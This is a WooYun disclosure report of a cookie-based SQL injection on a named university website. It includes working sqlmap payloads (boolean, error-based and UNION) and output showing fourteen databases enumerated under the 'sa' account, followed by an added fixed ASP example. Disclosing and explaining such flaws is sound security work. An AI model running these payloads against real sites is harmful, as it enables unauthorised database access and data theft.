
Vulnerability summary

Defect ID: wooyun-2015-091711

Title: Cookie injection in the North China University of Technology (北方工业大学) part-time graduate education website

Vendor: North China University of Technology (北方工业大学)

Author: 黑白

Submitted: 2015-01-15 12:22

Fixed: 2015-01-20 12:24

Published: 2015-01-20 12:24

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 18

Status: handed to a third-party partner organisation (CCERT education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-01-15: details sent to the vendor, awaiting vendor handling
2015-01-20: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Cookie injection

Detailed description:

Cookie injection

Proof of vulnerability:

Injection point: http://pdjx.ncut.edu.cn/common/gzzd.asp?lb=rule
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: lb
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lb=rule' AND 2702=2702 AND 'JdaR'='JdaR

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lb=rule' AND 4131=CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4131=4131) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(119)+CHAR(108)+CHAR(113))) AND 'tTmZ'='tTmZ

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: lb=rule' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(105)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(106)+CHAR(77)+CHAR(71)+CHAR(115)+CHAR(69)+CHAR(77)+CHAR(108)+CHAR(105)+CHAR(78)+CHAR(73)+CHAR(113)+CHAR(98)+CHAR(119)+CHAR(108)+CHAR(113)--
---
[21:16:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[21:16:06] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\pdjx.ncut.edu.cn'
[*] shutting down at 21:16:06
available databases [14]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] webds
[*] webfp
[*] weblqcx
[*] webqyds
[*] webtcz
[*] webyybm
[*] zyf_jiaowu
[*] zyxw
current user: 'sa'
current database: 'zyf_jiaowu'
Database: zyf_jiaowu
[314 tables]

Fix recommendation:

Filter the input!
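The one-word fix above is worth spelling out. The block below is an added illustration, not the site's own code (the page shows only sqlmap output, never the ASP source): it assumes the usual classic-ASP cause of cookie injection, reading the parameter with Request("lb"), which searches QueryString, Form and Cookies in turn, and concatenating it into the query; the table and column names (t_rule, content), the accepted values and Application("ConnStr") are assumptions as well.

```asp
<%
' Added example, not the site's own code. Assumed: the page read lb with
' Request("lb") and concatenated it into SQL; t_rule / content are invented
' names; Application("ConnStr") stands in for the real connection string.
Option Explicit
Dim conn, cmd, rs, lb

' --- Vulnerable pattern (assumed), kept as a comment for contrast ---
' Request("lb") falls through QueryString, Form and Cookies, so a cookie
' named "lb" reaches the query even when the URL looks clean, and the value
' is spliced straight into the SQL text:
'   lb = Request("lb")
'   Set rs = conn.Execute("SELECT content FROM t_rule WHERE lb='" & lb & "'")

' --- Fixed version ---
' 1. Read only the collection the page is meant to take lb from.
lb = Request.QueryString("lb")

' 2. Allow-list: lb selects a fixed page section, so only known values pass
'    (the list itself is assumed).
Select Case lb
    Case "rule", "notice"
        ' accepted
    Case Else
        Response.Status = "400 Bad Request"
        Response.End
End Select

' 3. Bind the value as a parameter instead of concatenating it, so the
'    database never parses it as SQL even if step 2 is later relaxed.
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnStr")

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1                       ' adCmdText
cmd.CommandText = "SELECT content FROM t_rule WHERE lb = ?"
' CreateParameter(name, type, direction, size, value): 200 = adVarChar, 1 = adParamInput
cmd.Parameters.Append cmd.CreateParameter("lb", 200, 1, 20, lb)

Set rs = cmd.Execute
Do Until rs.EOF
    Response.Write Server.HTMLEncode(rs("content")) & "<br>"
    rs.MoveNext
Loop
rs.Close
conn.Close
%>
```

The sqlmap output also shows the application connecting as 'sa'; a dedicated login with read-only access to zyf_jiaowu would limit what any remaining injection could reach, including the other thirteen databases listed.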

Copyright notice: when reposting, please credit the source: 黑白@WooYun


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-01-20 12:24

Vendor reply:

Latest status:

None yet